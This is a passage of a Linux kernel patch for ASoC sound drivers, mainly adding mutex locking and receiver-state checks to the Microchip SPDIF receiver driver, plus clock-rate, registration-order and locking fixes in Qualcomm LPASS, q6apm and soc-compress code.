+ 	int ret;
+ 
+ 	dev_dbg(dev->dev, "%s() rate=%u format=%#x width=%u channels=%u\n",
+@@ -413,13 +374,6 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
+-	regmap_read(dev->regmap, SPDIFRX_MR, &mr);
+-
+-	if (mr & SPDIFRX_MR_RXEN_ENABLE) {
+-		dev_err(dev->dev, "PCM already running\n");
+-		return -EBUSY;
+-	}
+-
+ 	if (params_channels(params) != SPDIFRX_CHANNELS) {
+ 		dev_err(dev->dev, "unsupported number of channels: %d\n",
+ 			params_channels(params));
+@@ -445,6 +399,13 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		return -EINVAL;
+ 	}
+ 
++	mutex_lock(&dev->mlock);
++	if (dev->trigger_enabled) {
++		dev_err(dev->dev, "PCM already running\n");
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	if (dev->gclk_enabled) {
+ 		clk_disable_unprepare(dev->gclk);
+ 		dev->gclk_enabled = 0;
+@@ -455,19 +416,24 @@ static int mchp_spdifrx_hw_params(struct snd_pcm_substream *substream,
+ 		dev_err(dev->dev,
+ 			"unable to set gclk min rate: rate %u * ratio %u + 1\n",
+ 			params_rate(params), SPDIFRX_GCLK_RATIO_MIN);
+-		return ret;
++		goto unlock;
+ 	}
+ 	ret = clk_prepare_enable(dev->gclk);
+ 	if (ret) {
+ 		dev_err(dev->dev, "unable to enable gclk: %d\n", ret);
+-		return ret;
++		goto unlock;
+ 	}
+ 	dev->gclk_enabled = 1;
+ 
+ 	dev_dbg(dev->dev, "GCLK range min set to %d\n",
+ 		params_rate(params) * SPDIFRX_GCLK_RATIO_MIN + 1);
+ 
+-	return regmap_write(dev->regmap, SPDIFRX_MR, mr);
++	ret = regmap_write(dev->regmap, SPDIFRX_MR, mr);
++
++unlock:
++	mutex_unlock(&dev->mlock);
++
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_hw_free(struct snd_pcm_substream *substream,
+@@ -475,10 +441,12 @@ static int mchp_spdifrx_hw_free(struct snd_pcm_substream *substream,
+ {
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 
++	mutex_lock(&dev->mlock);
+ 	if (dev->gclk_enabled) {
+ 		clk_disable_unprepare(dev->gclk);
+ 		dev->gclk_enabled = 0;
+ 	}
++	mutex_unlock(&dev->mlock);
+ 	return 0;
+ }
+ 
+@@ -515,22 +483,51 @@ static int mchp_spdifrx_cs_get(struct mchp_spdifrx_dev *dev,
+ {
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+ 	struct mchp_spdifrx_ch_stat *ch_stat = &ctrl->ch_stat[channel];
+-	int ret;
+-
+-	regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_CSC(channel));
+-	/* check for new data available */
+-	ret = wait_for_completion_interruptible_timeout(&ch_stat->done,
+-							msecs_to_jiffies(100));
+-	/* IP might not be started or valid stream might not be present */
+-	if (ret < 0) {
+-		dev_dbg(dev->dev, "channel status for channel %d timeout\n",
+-			channel);
++	int ret = 0;
++
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * We may reach this point with both clocks enabled but the receiver
++	 * still disabled. To void waiting for completion and return with
++	 * timeout check the dev->trigger_enabled.
++	 *
++	 * To retrieve data:
++	 * - if the receiver is enabled CSC IRQ will update the data in software
++	 *   caches (ch_stat->data)
++	 * - otherwise we just update it here the software caches with latest
++	 *   available information and return it; in this case we don't need
++	 *   spin locking as the IRQ is disabled and will not be raised from
++	 *   anywhere else.
++	 */
++
++	if (dev->trigger_enabled) {
++		reinit_completion(&ch_stat->done);
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_CSC(channel));
++		/* Check for new data available */
++		ret = wait_for_completion_interruptible_timeout(&ch_stat->done,
++								msecs_to_jiffies(100));
++		/* Valid stream might not be present */
++		if (ret <= 0) {
++			dev_dbg(dev->dev, "channel status for channel %d timeout\n",
++				channel);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_CSC(channel));
++			ret = ret ? : -ETIMEDOUT;
++			goto unlock;
++		} else {
++			ret = 0;
++		}
++	} else {
++		/* Update software cache with latest channel status. */
++		mchp_spdifrx_channel_status_read(dev, channel);
+ 	}
+ 
+ 	memcpy(uvalue->value.iec958.status, ch_stat->data,
+ 	       sizeof(ch_stat->data));
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&dev->mlock);
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_cs1_get(struct snd_kcontrol *kcontrol,
+@@ -564,29 +561,49 @@ static int mchp_spdifrx_subcode_ch_get(struct mchp_spdifrx_dev *dev,
+ 				       int channel,
+ 				       struct snd_ctl_elem_value *uvalue)
+ {
+-	unsigned long flags;
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+ 	struct mchp_spdifrx_user_data *user_data = &ctrl->user_data[channel];
+-	int ret;
+-
+-	reinit_completion(&user_data->done);
+-	mchp_spdifrx_isr_blockend_en(dev);
+-	ret = wait_for_completion_interruptible_timeout(&user_data->done,
+-							msecs_to_jiffies(100));
+-	/* IP might not be started or valid stream might not be present */
+-	if (ret <= 0) {
+-		dev_dbg(dev->dev, "user data for channel %d timeout\n",
+-			channel);
+-		mchp_spdifrx_isr_blockend_dis(dev);
+-		return ret;
++	int ret = 0;
++
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * We may reach this point with both clocks enabled but the receiver
++	 * still disabled. To void waiting for completion to just timeout we
++	 * check here the dev->trigger_enabled flag.
++	 *
++	 * To retrieve data:
++	 * - if the receiver is enabled we need to wait for blockend IRQ to read
++	 *   data to and update it for us in software caches
++	 * - otherwise reading the SPDIFRX_CHUD() registers is enough.
++	 */
++
++	if (dev->trigger_enabled) {
++		reinit_completion(&user_data->done);
++		regmap_write(dev->regmap, SPDIFRX_IER, SPDIFRX_IR_BLOCKEND);
++		ret = wait_for_completion_interruptible_timeout(&user_data->done,
++								msecs_to_jiffies(100));
++		/* Valid stream might not be present. */
++		if (ret <= 0) {
++			dev_dbg(dev->dev, "user data for channel %d timeout\n",
++				channel);
++			regmap_write(dev->regmap, SPDIFRX_IDR, SPDIFRX_IR_BLOCKEND);
++			ret = ret ? : -ETIMEDOUT;
++			goto unlock;
++		} else {
++			ret = 0;
++		}
++	} else {
++		/* Update software cache with last available data. */
++		mchp_spdifrx_channel_user_data_read(dev, channel);
+ 	}
+ 
+-	spin_lock_irqsave(&user_data->lock, flags);
+ 	memcpy(uvalue->value.iec958.subcode, user_data->data,
+ 	       sizeof(user_data->data));
+-	spin_unlock_irqrestore(&user_data->lock, flags);
+ 
+-	return 0;
++unlock:
++	mutex_unlock(&dev->mlock);
++	return ret;
+ }
+ 
+ static int mchp_spdifrx_subcode_ch1_get(struct snd_kcontrol *kcontrol,
+@@ -627,10 +644,24 @@ static int mchp_spdifrx_ulock_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	bool ulock_old = ctrl->ulock;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->ulock = !(val & SPDIFRX_RSR_ULOCK);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK has wrong value if both pclk and gclk are enabled
++	 * and the receiver is disabled. Thus we take into account the
++	 * dev->trigger_enabled here to return a real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		ctrl->ulock = !(val & SPDIFRX_RSR_ULOCK);
++	} else {
++		ctrl->ulock = 0;
++	}
++
+ 	uvalue->value.integer.value[0] = ctrl->ulock;
+ 
++	mutex_unlock(&dev->mlock);
++
+ 	return ulock_old != ctrl->ulock;
+ }
+ 
+@@ -643,8 +674,22 @@ static int mchp_spdifrx_badf_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	bool badf_old = ctrl->badf;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->badf = !!(val & SPDIFRX_RSR_BADF);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK has wrong value if both pclk and gclk are enabled
++	 * and the receiver is disabled. Thus we take into account the
++	 * dev->trigger_enabled here to return a real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		ctrl->badf = !!(val & SPDIFRX_RSR_BADF);
++	} else {
++		ctrl->badf = 0;
++	}
++
++	mutex_unlock(&dev->mlock);
++
+ 	uvalue->value.integer.value[0] = ctrl->badf;
+ 
+ 	return badf_old != ctrl->badf;
+@@ -656,11 +701,48 @@ static int mchp_spdifrx_signal_get(struct snd_kcontrol *kcontrol,
+ 	struct snd_soc_dai *dai = snd_kcontrol_chip(kcontrol);
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 	struct mchp_spdifrx_mixer_control *ctrl = &dev->control;
+-	u32 val;
++	u32 val = ~0U, loops = 10;
++	int ret;
+ 	bool signal_old = ctrl->signal;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-	ctrl->signal = !(val & SPDIFRX_RSR_NOSIGNAL);
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * To get the signal we need to have receiver enabled. This
++	 * could be enabled also from trigger() function thus we need to
++	 * take care of not disabling the receiver when it runs.
++	 */
++	if (!dev->trigger_enabled) {
++		ret = clk_prepare_enable(dev->gclk);
++		if (ret)
++			goto unlock;
++
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_ENABLE);
++
++		/* Wait for RSR.ULOCK bit. */
++		while (--loops) {
++			regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++			if (!(val & SPDIFRX_RSR_ULOCK))
++				break;
++			usleep_range(100, 150);
++		}
++
++		regmap_update_bits(dev->regmap, SPDIFRX_MR, SPDIFRX_MR_RXEN_MASK,
++				   SPDIFRX_MR_RXEN_DISABLE);
++
++		clk_disable_unprepare(dev->gclk);
++	} else {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++	}
++
++unlock:
++	mutex_unlock(&dev->mlock);
++
++	if (!(val & SPDIFRX_RSR_ULOCK))
++		ctrl->signal = !(val & SPDIFRX_RSR_NOSIGNAL);
++	else
++		ctrl->signal = 0;
+ 	uvalue->value.integer.value[0] = ctrl->signal;
+ 
+ 	return signal_old != ctrl->signal;
+@@ -685,18 +767,32 @@ static int mchp_spdifrx_rate_get(struct snd_kcontrol *kcontrol,
+ 	u32 val;
+ 	int rate;
+ 
+-	regmap_read(dev->regmap, SPDIFRX_RSR, &val);
+-
+-	/* if the receiver is not locked, ISF data is invalid */
+-	if (val & SPDIFRX_RSR_ULOCK || !(val & SPDIFRX_RSR_IFS_MASK)) {
++	mutex_lock(&dev->mlock);
++
++	/*
++	 * The RSR.ULOCK has wrong value if both pclk and gclk are enabled
++	 * and the receiver is disabled. Thus we take into account the
++	 * dev->trigger_enabled here to return a real status.
++	 */
++	if (dev->trigger_enabled) {
++		regmap_read(dev->regmap, SPDIFRX_RSR, &val);
++		/* If the receiver is not locked, ISF data is invalid. */
++		if (val & SPDIFRX_RSR_ULOCK || !(val & SPDIFRX_RSR_IFS_MASK)) {
++			ucontrol->value.integer.value[0] = 0;
++			goto unlock;
++		}
++	} else {
++		/* Reveicer is not locked, IFS data is invalid. */
+ 		ucontrol->value.integer.value[0] = 0;
+-		return 0;
++		goto unlock;
+ 	}
+ 
+ 	rate = clk_get_rate(dev->gclk);
+ 
+ 	ucontrol->value.integer.value[0] = rate / (32 * SPDIFRX_RSR_IFS(val));
+ 
++unlock:
++	mutex_unlock(&dev->mlock);
+ 	return 0;
+ }
+ 
+@@ -808,11 +904,9 @@ static int mchp_spdifrx_dai_probe(struct snd_soc_dai *dai)
+ 		     SPDIFRX_MR_AUTORST_NOACTION |
+ 		     SPDIFRX_MR_PACK_DISABLED);
+ 
+-	dev->blockend_refcount = 0;
+ 	for (ch = 0; ch < SPDIFRX_CHANNELS; ch++) {
+ 		init_completion(&ctrl->ch_stat[ch].done);
+ 		init_completion(&ctrl->user_data[ch].done);
+-		spin_lock_init(&ctrl->user_data[ch].lock);
+ 	}
+ 
+ 	/* Add controls */
+@@ -827,7 +921,7 @@ static int mchp_spdifrx_dai_remove(struct snd_soc_dai *dai)
+ 	struct mchp_spdifrx_dev *dev = snd_soc_dai_get_drvdata(dai);
+ 
+ 	/* Disable interrupts */
+-	regmap_write(dev->regmap, SPDIFRX_IDR, 0xFF);
++	regmap_write(dev->regmap, SPDIFRX_IDR, GENMASK(14, 0));
+ 
+ 	clk_disable_unprepare(dev->pclk);
+ 
+@@ -913,7 +1007,17 @@ static int mchp_spdifrx_probe(struct platform_device *pdev)
+ 			"failed to get the PMC generated clock: %d\n", err);
+ 		return err;
+ 	}
+-	spin_lock_init(&dev->blockend_lock);
++
++	/*
++	 * Signal control need a valid rate on gclk. hw_params() configures
++	 * it propertly but requesting signal before any hw_params() has been
++	 * called lead to invalid value returned for signal. Thus, configure
++	 * gclk at a valid rate, here, in initialization, to simplify the
++	 * control path.
++	 */
++	clk_set_min_rate(dev->gclk, 48000 * SPDIFRX_GCLK_RATIO_MIN + 1);
++
++	mutex_init(&dev->mlock);
+ 
+ 	dev->dev = &pdev->dev;
+ 	dev->regmap = regmap;
+diff --git a/sound/soc/codecs/lpass-rx-macro.c b/sound/soc/codecs/lpass-rx-macro.c
+index a9ef9d5ffcc5c..8621cfabcf5b6 100644
+--- a/sound/soc/codecs/lpass-rx-macro.c
++++ b/sound/soc/codecs/lpass-rx-macro.c
+@@ -366,7 +366,7 @@
+ #define CDC_RX_DSD1_CFG2			(0x0F8C)
+ #define RX_MAX_OFFSET				(0x0F8C)
+ 
+-#define MCLK_FREQ		9600000
++#define MCLK_FREQ		19200000
+ 
+ #define RX_MACRO_RATES (SNDRV_PCM_RATE_8000 | SNDRV_PCM_RATE_16000 |\
+ 			SNDRV_PCM_RATE_32000 | SNDRV_PCM_RATE_48000 |\
+@@ -3579,7 +3579,7 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(rx->mclk, MCLK_FREQ);
+-	clk_set_rate(rx->npl, 2 * MCLK_FREQ);
++	clk_set_rate(rx->npl, MCLK_FREQ);
+ 
+ 	ret = clk_prepare_enable(rx->macro);
+ 	if (ret)
+@@ -3601,10 +3601,6 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = rx_macro_register_mclk_output(rx);
+-	if (ret)
+-		goto err_clkout;
+-
+ 	ret = devm_snd_soc_register_component(dev, &rx_macro_component_drv,
+ 					      rx_macro_dai,
+ 					      ARRAY_SIZE(rx_macro_dai));
+@@ -3618,6 +3614,10 @@ static int rx_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = rx_macro_register_mclk_output(rx);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 2ef62d6edc302..2449a2df66df0 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -203,7 +203,7 @@
+ #define TX_MACRO_AMIC_UNMUTE_DELAY_MS	100
+ #define TX_MACRO_DMIC_HPF_DELAY_MS	300
+ #define TX_MACRO_AMIC_HPF_DELAY_MS	300
+-#define MCLK_FREQ		9600000
++#define MCLK_FREQ		19200000
+ 
+ enum {
+ 	TX_MACRO_AIF_INVALID = 0,
+@@ -2014,7 +2014,7 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 
+ 	/* set MCLK and NPL rates */
+ 	clk_set_rate(tx->mclk, MCLK_FREQ);
+-	clk_set_rate(tx->npl, 2 * MCLK_FREQ);
++	clk_set_rate(tx->npl, MCLK_FREQ);
+ 
+ 	ret = clk_prepare_enable(tx->macro);
+ 	if (ret)
+@@ -2036,10 +2036,6 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = tx_macro_register_mclk_output(tx);
+-	if (ret)
+-		goto err_clkout;
+-
+ 	ret = devm_snd_soc_register_component(dev, &tx_macro_component_drv,
+ 					      tx_macro_dai,
+ 					      ARRAY_SIZE(tx_macro_dai));
+@@ -2052,6 +2048,10 @@ static int tx_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = tx_macro_register_mclk_output(tx);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-va-macro.c b/sound/soc/codecs/lpass-va-macro.c
+index b0b6cf29cba30..1623ba78ddb3d 100644
+--- a/sound/soc/codecs/lpass-va-macro.c
++++ b/sound/soc/codecs/lpass-va-macro.c
+@@ -1524,16 +1524,6 @@ static int va_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_mclk;
+ 
+-	ret = va_macro_register_fsgen_output(va);
+-	if (ret)
+-		goto err_clkout;
+-
+-	va->fsgen = clk_hw_get_clk(&va->hw, "fsgen");
+-	if (IS_ERR(va->fsgen)) {
+-		ret = PTR_ERR(va->fsgen);
+-		goto err_clkout;
+-	}
+-
+ 	if (va->has_swr_master) {
+ 		/* Set default CLK div to 1 */
+ 		regmap_update_bits(va->regmap, CDC_VA_TOP_CSR_SWR_MIC_CTL0,
+@@ -1560,6 +1550,16 @@ static int va_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = va_macro_register_fsgen_output(va);
++	if (ret)
++		goto err_clkout;
++
++	va->fsgen = clk_hw_get_clk(&va->hw, "fsgen");
++	if (IS_ERR(va->fsgen)) {
++		ret = PTR_ERR(va->fsgen);
++		goto err_clkout;
++	}
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index 5cfe96f6e430e..c0b86d69c72e3 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -2451,11 +2451,6 @@ static int wsa_macro_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto err_fsgen;
+ 
+-	ret = wsa_macro_register_mclk_output(wsa);
+-	if (ret)
+-		goto err_clkout;
+-
+-
+ 	ret = devm_snd_soc_register_component(dev, &wsa_macro_component_drv,
+ 					      wsa_macro_dai,
+ 					      ARRAY_SIZE(wsa_macro_dai));
+@@ -2468,6 +2463,10 @@ static int wsa_macro_probe(struct platform_device *pdev)
+ 	pm_runtime_set_active(dev);
+ 	pm_runtime_enable(dev);
+ 
++	ret = wsa_macro_register_mclk_output(wsa);
++	if (ret)
++		goto err_clkout;
++
+ 	return 0;
+ 
+ err_clkout:
+diff --git a/sound/soc/codecs/tlv320adcx140.c b/sound/soc/codecs/tlv320adcx140.c
+index 91a22d9279158..530f321d08e9c 100644
+--- a/sound/soc/codecs/tlv320adcx140.c
++++ b/sound/soc/codecs/tlv320adcx140.c
+@@ -925,7 +925,7 @@ static int adcx140_configure_gpio(struct adcx140_priv *adcx140)
+ 
+ 	gpio_count = device_property_count_u32(adcx140->dev,
+ 			"ti,gpio-config");
+-	if (gpio_count == 0)
++	if (gpio_count <= 0)
+ 		return 0;
+ 
+ 	if (gpio_count != ADCX140_NUM_GPIO_CFGS)
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index 35a52c3a020d1..4967f2daa6d97 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -281,6 +281,7 @@ static int fsl_sai_set_dai_fmt_tr(struct snd_soc_dai *cpu_dai,
+ 		val_cr4 |= FSL_SAI_CR4_MF;
+ 
+ 	sai->is_pdm_mode = false;
++	sai->is_dsp_mode = false;
+ 	/* DAI mode */
+ 	switch (fmt & SND_SOC_DAIFMT_FORMAT_MASK) {
+ 	case SND_SOC_DAIFMT_I2S:
+diff --git a/sound/soc/kirkwood/kirkwood-dma.c b/sound/soc/kirkwood/kirkwood-dma.c
+index 700a18561a940..640cebd2983e2 100644
+--- a/sound/soc/kirkwood/kirkwood-dma.c
++++ b/sound/soc/kirkwood/kirkwood-dma.c
+@@ -86,7 +86,7 @@ kirkwood_dma_conf_mbus_windows(void __iomem *base, int win,
+ 
+ 	/* try to find matching cs for current dma address */
+ 	for (i = 0; i < dram->num_cs; i++) {
+-		const struct mbus_dram_window *cs = dram->cs + i;
++		const struct mbus_dram_window *cs = &dram->cs[i];
+ 		if ((cs->base & 0xffff0000) < (dma & 0xffff0000)) {
+ 			writel(cs->base & 0xffff0000,
+ 				base + KIRKWOOD_AUDIO_WIN_BASE_REG(win));
+diff --git a/sound/soc/qcom/qdsp6/q6apm-dai.c b/sound/soc/qcom/qdsp6/q6apm-dai.c
+index ee59ef36b85a6..7f02f5b2c33fd 100644
+--- a/sound/soc/qcom/qdsp6/q6apm-dai.c
++++ b/sound/soc/qcom/qdsp6/q6apm-dai.c
+@@ -8,6 +8,7 @@
+ #include <linux/slab.h>
+ #include <sound/soc.h>
+ #include <sound/soc-dapm.h>
++#include <linux/spinlock.h>
+ #include <sound/pcm.h>
+ #include <asm/dma.h>
+ #include <linux/dma-mapping.h>
+@@ -53,6 +54,7 @@ struct q6apm_dai_rtd {
+ 	uint16_t session_id;
+ 	enum stream_state state;
+ 	struct q6apm_graph *graph;
++	spinlock_t lock;
+ };
+ 
+ struct q6apm_dai_data {
+@@ -62,7 +64,8 @@ struct q6apm_dai_data {
+ static struct snd_pcm_hardware q6apm_dai_hardware_capture = {
+ 	.info =                 (SNDRV_PCM_INFO_MMAP | SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 				 SNDRV_PCM_INFO_MMAP_VALID | SNDRV_PCM_INFO_INTERLEAVED |
+-				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
++				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME |
++				 SNDRV_PCM_INFO_BATCH),
+ 	.formats =              (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE),
+ 	.rates =                SNDRV_PCM_RATE_8000_48000,
+ 	.rate_min =             8000,
+@@ -80,7 +83,8 @@ static struct snd_pcm_hardware q6apm_dai_hardware_capture = {
+ static struct snd_pcm_hardware q6apm_dai_hardware_playback = {
+ 	.info =                 (SNDRV_PCM_INFO_MMAP | SNDRV_PCM_INFO_BLOCK_TRANSFER |
+ 				 SNDRV_PCM_INFO_MMAP_VALID | SNDRV_PCM_INFO_INTERLEAVED |
+-				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME),
++				 SNDRV_PCM_INFO_PAUSE | SNDRV_PCM_INFO_RESUME |
++				 SNDRV_PCM_INFO_BATCH),
+ 	.formats =              (SNDRV_PCM_FMTBIT_S16_LE | SNDRV_PCM_FMTBIT_S24_LE),
+ 	.rates =                SNDRV_PCM_RATE_8000_192000,
+ 	.rate_min =             8000,
+@@ -99,20 +103,25 @@ static void event_handler(uint32_t opcode, uint32_t token, uint32_t *payload, vo
+ {
+ 	struct q6apm_dai_rtd *prtd = priv;
+ 	struct snd_pcm_substream *substream = prtd->substream;
++	unsigned long flags;
+ 
+ 	switch (opcode) {
+ 	case APM_CLIENT_EVENT_CMD_EOS_DONE:
+ 		prtd->state = Q6APM_STREAM_STOPPED;
+ 		break;
+ 	case APM_CLIENT_EVENT_DATA_WRITE_DONE:
++	        spin_lock_irqsave(&prtd->lock, flags);
+ 		prtd->pos += prtd->pcm_count;
++		spin_unlock_irqrestore(&prtd->lock, flags);
+ 		snd_pcm_period_elapsed(substream);
+ 		if (prtd->state == Q6APM_STREAM_RUNNING)
+ 			q6apm_write_async(prtd->graph, prtd->pcm_count, 0, 0, 0);
+ 
+ 		break;
+ 	case APM_CLIENT_EVENT_DATA_READ_DONE:
++	        spin_lock_irqsave(&prtd->lock, flags);
+ 		prtd->pos += prtd->pcm_count;
++		spin_unlock_irqrestore(&prtd->lock, flags);
+ 		snd_pcm_period_elapsed(substream);
+ 		if (prtd->state == Q6APM_STREAM_RUNNING)
+ 			q6apm_read(prtd->graph);
+@@ -253,6 +262,7 @@ static int q6apm_dai_open(struct snd_soc_component *component,
+ 	if (prtd == NULL)
+ 		return -ENOMEM;
+ 
++	spin_lock_init(&prtd->lock);
+ 	prtd->substream = substream;
+ 	prtd->graph = q6apm_graph_open(dev, (q6apm_cb)event_handler, prtd, graph_id);
+ 	if (IS_ERR(prtd->graph)) {
+@@ -332,11 +342,17 @@ static snd_pcm_uframes_t q6apm_dai_pointer(struct snd_soc_component *component,
+ {
+ 	struct snd_pcm_runtime *runtime = substream->runtime;
+ 	struct q6apm_dai_rtd *prtd = runtime->private_data;
++	snd_pcm_uframes_t ptr;
++	unsigned long flags;
+ 
++	spin_lock_irqsave(&prtd->lock, flags);
+ 	if (prtd->pos == prtd->pcm_size)
+ 		prtd->pos = 0;
+ 
+-	return bytes_to_frames(runtime, prtd->pos);
++	ptr =  bytes_to_frames(runtime, prtd->pos);
++	spin_unlock_irqrestore(&prtd->lock, flags);
++
++	return ptr;
+ }
+ 
+ static int q6apm_dai_hw_params(struct snd_soc_component *component,
+diff --git a/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c b/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
+index ce9e5646d8f3a..23d23bc6fbaa7 100644
+--- a/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
++++ b/sound/soc/qcom/qdsp6/q6apm-lpass-dais.c
+@@ -127,6 +127,11 @@ static int q6apm_lpass_dai_prepare(struct snd_pcm_substream *substream, struct s
+ 	int graph_id = dai->id;
+ 	int rc;
+ 
++	if (dai_data->is_port_started[dai->id]) {
++		q6apm_graph_stop(dai_data->graph[dai->id]);
++		dai_data->is_port_started[dai->id] = false;
++	}
++
+ 	/**
+ 	 * It is recommend to load DSP with source graph first and then sink
+ 	 * graph, so sequence for playback and capture will be different
+diff --git a/sound/soc/sh/rcar/rsnd.h b/sound/soc/sh/rcar/rsnd.h
+index d9cd190d7e198..f8ef6836ef84e 100644
+--- a/sound/soc/sh/rcar/rsnd.h
++++ b/sound/soc/sh/rcar/rsnd.h
+@@ -901,8 +901,6 @@ void rsnd_mod_make_sure(struct rsnd_mod *mod, enum rsnd_mod_type type);
+ 	if (!IS_BUILTIN(RSND_DEBUG_NO_DAI_CALL))	\
+ 		dev_dbg(dev, param)
+ 
+-#endif
+-
+ #ifdef CONFIG_DEBUG_FS
+ int rsnd_debugfs_probe(struct snd_soc_component *component);
+ void rsnd_debugfs_reg_show(struct seq_file *m, phys_addr_t _addr,
+@@ -913,3 +911,5 @@ void rsnd_debugfs_mod_reg_show(struct seq_file *m, struct rsnd_mod *mod,
+ #else
+ #define rsnd_debugfs_probe  NULL
+ #endif
++
++#endif /* RSND_H */
+diff --git a/sound/soc/soc-compress.c b/sound/soc/soc-compress.c
+index 870f13e1d389c..e7aa6f360cabe 100644
+--- a/sound/soc/soc-compress.c
++++ b/sound/soc/soc-compress.c
+@@ -149,6 +149,8 @@ static int soc_compr_open_fe(struct snd_compr_stream *cstream)
+ 	if (ret < 0)
+ 		goto be_err;
+ 
++	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
++
+ 	/* calculate valid and active FE <-> BE dpcms */
+ 	dpcm_process_paths(fe, stream, &list, 1);
+ 	fe->dpcm[stream].runtime = fe_substream->runtime;
+@@ -184,7 +186,6 @@ static int soc_compr_open_fe(struct snd_compr_stream *cstream)
+ 	fe->dpcm[stream].state = SND_SOC_DPCM_STATE_OPEN;
+ 	fe->dpcm[stream].runtime_update = SND_SOC_DPCM_UPDATE_NO;
+ 
+-	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	snd_soc_runtime_activate(fe, stream);
+ 	mutex_unlock(&fe->card->pcm_mutex);
+ 
+@@ -215,7 +216,6 @@ static int soc_compr_free_fe(struct snd_compr_stream *cstream)
+ 
+ 	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	snd_soc_runtime_deactivate(fe, stream);
+-	mutex_unlock(&fe->card->pcm_mutex);
+ 
+ 	fe->dpcm[stream].runtime_update = SND_SOC_DPCM_UPDATE_FE;
+ 
+@@ -234,6 +234,8 @@ static int soc_compr_free_fe(struct snd_compr_stream *cstream)
+ 
+ 	dpcm_be_disconnect(fe, stream);
+ 
++	mutex_unlock(&fe->card->pcm_mutex);
++
+ 	fe->dpcm[stream].runtime = NULL;
+ 
+ 	snd_soc_link_compr_shutdown(cstream, 0);
+@@ -409,8 +411,9 @@ static int soc_compr_set_params_fe(struct snd_compr_stream *cstream,
+ 	ret = snd_soc_link_compr_set_params(cstream);
+ 	if (ret < 0)
+ 		goto out;
+-
++	mutex_lock_nested(&fe->card->pcm_mutex, fe->card->pcm_subclass);
+ 	dpcm_dapm_stream_event(fe, stream, SND_SOC_DAPM_STREAM_START);
++	mutex_unlock(&fe->card->pcm_mutex);
+ 	fe->dpcm[stream].state = SND_SOC_DPCM_STATE_PREPARE;
+ 
+ out:
+@@ -623,7 +626,7 @@ int snd_soc_new_compress(struct snd_soc_pcm_runtime *rtd, int num)
